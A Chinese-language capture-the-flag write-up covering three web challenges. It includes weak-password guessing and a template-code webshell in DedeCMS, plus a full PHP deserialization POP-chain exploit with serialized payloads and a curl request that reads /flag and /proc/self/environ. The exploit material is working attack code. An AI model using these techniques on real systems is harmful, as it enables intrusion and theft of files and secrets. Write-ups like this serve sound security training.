dedecms | SOLVED | pig8086
先注册一个账户,查看列表发现有一个用户叫Aa123456789,看着很随便,密码我猜也是Aa123456789。
居然对了!
版本:DedeCMS_V57_UTF8_SP2_118
搜索一下,CVE-2025-15004?
但是这个Aa123456789账号莫名其妙的,管理功能不全。
尝试把自己注册的账号提权到超级管理员。功能居然全了!
去里面捣鼓一下,把模板引擎改掉。
随便挑一个幸运模板,植入代码。直接webshell失败,他似乎能检测GET POST REQUEST关键字。
那么就繁琐一点,改一次代码访问一次。
先phpinfo,结果发现环境变量被清空了。
读一下根目录,发现flag在flag.txt里面。
hellogate | SOLVED | pig8086
先直接读图片,发现图片后面跟了个PHP代码,是一个序列化。
<?php
error_reporting(0);
class A {
public $handle;
public function triggerMethod() {
echo "" . $this->handle;
}
}
class B {
public $worker;
public $cmd;
public function __toString() {
return $this->worker->result;
}
}
class C {
public $cmd;
public function __get($name) {
echo file_get_contents($this->cmd);
}
}
$raw = isset($_POST['data']) ? $_POST['data'] : '';
header('Content-Type: image/jpeg');
readfile("muzujijiji.jpg");
highlight_file(__FILE__);
$obj = unserialize($_POST['data']);
$obj->triggerMethod();让我们构造反序列化。
<?php
error_reporting(0);
class A {
public $handle;
}
class B {
public $worker;
public $cmd;
}
class C {
public $cmd="/flag";
}
$tmp=new A();
$tmp->handle=new B();
$tmp->handle->worker=new C();
echo serialize($tmp);
?>
O:1:"A":1:{s:6:"handle";O:1:"B":1:{s:6:"worker";O:1:"C":1:{s:3:"cmd";s:5:"/flag";}}}
O:1:"A":1:{s:6:"handle";O:1:"B":1:{s:6:"worker";O:1:"C":1:{s:3:"cmd";s:12:"file:///flag";}}}
O:1:"A":1:{s:6:"handle";O:1:"B":1:{s:6:"worker";O:1:"C":1:{s:3:"cmd";s:18:"/proc/self/environ";}}}
O:1:"A":1:{s:6:"handle";O:1:"B":1:{s:6:"worker";O:1:"C":1:{s:3:"cmd";s:25:"file:///proc/self/environ";}}}第一个是对的。
curl -X POST "https://eci-2zed8dg77ztc1c4j37s1.cloudeci1.ichunqiu.com:80/" -d "data=%4f%3a%31%3a%22%41%22%3a%31%3a%7b%73%3a%36%3a%22%68%61%6e%64%6c%65%22%3b%4f%3a%31%3a%22%42%22%3a%32%3a%7b%73%3a%36%3a%22%77%6f%72%6b%65%72%22%3b%4f%3a%31%3a%22%43%22%3a%31%3a%7b%73%3a%33%3a%22%63%6d%64%22%3b%73%3a%35%3a%22%2f%66%6c%61%67%22%3b%7d%73%3a%33%3a%22%63%6d%64%22%3b%4e%3b%7d%7d" --output -在返回内容的末尾找到flag。
redjs | SOLVED | pig8086
CVE-2025-55182,一把梭
https://blog.csdn.net/qq_19623861/article/details/155853698
本页的评论功能已关闭